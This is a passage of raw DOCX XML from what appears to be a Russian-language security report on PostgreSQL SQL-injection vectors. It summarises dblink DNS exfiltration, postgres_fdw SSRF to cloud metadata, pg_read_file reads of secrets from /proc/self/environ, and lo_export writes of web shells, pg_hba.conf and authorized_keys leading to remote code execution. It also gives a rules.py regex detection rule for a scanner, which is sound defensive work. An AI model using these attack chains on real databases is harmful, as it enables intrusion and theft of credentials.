          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\b(dblink_connect|dblink_exec|dblink|CREATE\s+SERVER|CREATE\s+USER\s+MAPPING|CREATE\s+FOREIGN\s+TABLE|postgres_fdw|pg_read_file|pg_read_binary_file|pg_read_server_files|lo_import|lo_export|lo_get|lo_create|lo_put|lo_from_bytea|lo_unlink)\b</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Server-Side Functions for Large Objects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lo_get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lo_create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lo_put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lo_from_bytea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lo_unlink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Large Objects — Implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — внутренности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_largeobject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pg_largeobject_metadata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Predefined Roles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pg_write_server_files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lo_import / lo_export для file write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R4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Greenwolf: Authenticated arbitrary command execution on PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — классический разбор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для web-shell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section</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В блоке B (out-of-band каналы) разобраны четыре PG-специфичных вектора, через которые SQL-инъекция превращается в эксфильтрацию, SSRF или RCE без участия HTTP-ответа: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3.6.1 dblink_connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — OOB через PUBLIC-доступную extension после установки. Три payload-карточки: DNS-простой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DNS-chunked hex (полная эксфильтрация через RFC 1035 labels), TCP с захватом startup-packet. Самый низкий порог входа из всех четырёх векторов.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3.6.2 postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SSRF (cloud metadata, internal port scan, NTLM capture на Windows) + параллельный DNS-канал. Атака упакована в анонимный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-блок (избегает stacked-queries), требует цепочки трёх привилегий: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USAGE ON FDW</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схеме → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE USER MAPPING</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 pg_read_file / pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — file-read с возвратом прямо через UNION (без OOB-канала). Три уровня доступности: уровень (1) PUBLIC + относительные пути (PG_VERSION для fingerprinting); уровень (2)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абсолютные пути; уровень (3) superuser. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/environ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — приоритетная цель для env-vars (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DATABASE_URL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AWS_SECRET_ACCESS_KEY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PGPASSWORD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3.6.4 lo_import / lo_export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — двухшаговый OID-based file-read + единственный write-вектор во всей категории 3.6. Три цели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web-shell, перезапись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trust-auth, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Две разные predefined roles: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(read) vs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(write — выдаётся ещё реже).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сравнение векторов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Вектор</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Managed-доступность</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OOB (DNS + TCP)</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после </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATE EXTENSION dblink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Ограничена egress security-group</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SSRF + OOB (DNS)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USAGE ON FDW</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CREATE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на схеме</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Ограничена; на RDS preinstalled</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File-read (UNION)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 любая роль для PG_VERSION; (2) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_read_server_files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Уровни (2)/(3) структурно недоступны</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File r/w (OID)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pg_read_server_files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (R) + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_write_server_files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (W)</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 + W</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Структурно недоступна</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py — готовое правило для класса OOB_EXFILTRATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводный regex по всем четырём подразделам 3.6 — добавить как новый класс уязвимости и одну regex-ветку:</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OOB_EXFILTRATION = "oob_exfiltration"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VulnerabilityClass.OOB_EXFILTRATION: 9,</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"oob_exfil": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\b(dblink_connect|dblink_exec|dblink|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"CREATE\s+SERVER|CREATE\s+USER\s+MAPPING|CREATE\s+FOREIGN\s+TABLE|postgres_fdw|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"pg_read_file|pg_read_binary_file|pg_read_server_files|"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"lo_import|lo_export|lo_get|lo_create|lo_put|lo_from_bytea|lo_unlink)\b",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if _RE["oob_exfil"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    risk = 10 if re.search(r"\blo_export\b", sql, re.IGNORECASE) else 9</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vulnerability_class=VulnerabilityClass.OOB_EXFILTRATION,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=risk,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос использует функцию или DDL-конструкцию для "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "out-of-band эксфильтрации, SSRF или file-операций "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "(dblink / postgres_fdw / pg_read_file / lo_*).",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Удалите вызов; для admin-задач — отдельная роль "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "и сессия, не из веб-приложения.",</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поднимает risk до 10 как единственный write-вектор с RCE-потенциалом (web-shell,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trust, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — dblink эксфильтрация: HackTricks PostgreSQL Injection (dblink-lo_import section), PDKT-Team CTF writeup (fbctf2019 hr-admin-module).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — postgres_fdw SSRF: ibreak.software «Using SQL injection to perform SSRF/XSPA attacks», PostgreSQL Docs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R4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — pg_read_file и lo_*: PostgreSQL Docs (System Information Functions, Predefined Roles, Large Objects Implementation), Greenwolf «Authenticated arbitrary command execution on PostgreSQL» (классический разбор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для web-shell).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Общие:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy (SQLi cheat sheet, PostgreSQL section), RFC 1035 §2.3.1 (charset DNS-labels для 3.6.1/3.6.2 chunked-эксфильтрации), AWS docs про IMDSv2 (для 3.6.2 cloud metadata).</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почему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обходится без них. Анонимный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $$ BEGIN ... END $$;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-блок — одна команда для парсера, целая plpgsql-программа внутри. Атака на 3.6.2 проходит даже когда драйвер использует extended protocol (psycopg/asyncpg с параметрами, pgjdbc default), где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-stacking блокируется сервером. Поведение по 6 драйверам — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5</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 (RCE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — куда уходят chain-векторы из 3.6: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3.6.4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web-shell → HTTP-запрос → RCE как www-data (3.7.1).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3.6.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_export pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> trust + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_reload_conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → новый коннект superuser-ом → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.7.1).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3.6.2 SSRF cloud metadata → IAM credentials → cloud-side RCE (вне scope раздела 3, упомянуто в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пути получения нужных привилегий для 3.6.2/3.6.3/3.6.4:</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USAGE ON FOREIGN DATA WRAPPER postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — наследование от admin-роли, SECURITY DEFINER функции.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GRANT pg_read_server_files TO appuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> после компрометации DBA-роли.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(самая редкая) — практически только через superuser или прямой компромис backup-оператора.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все четыре вектора в managed-PG (AWS RDS, Google Cloud SQL, Supabase) ограничены или недоступны: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3.6.1, 3.6.2 — ограничены egress security-group / VPC-конфигом; preinstalled extension есть, но cloud metadata часто закрыт.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3.6.3, 3.6.4 — структурно недоступны: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зарезервированы за провайдером, не выдаются даже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Максимум — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PG_VERSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через уровень (1)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для fingerprinting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Детальный разбор по провайдерам — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
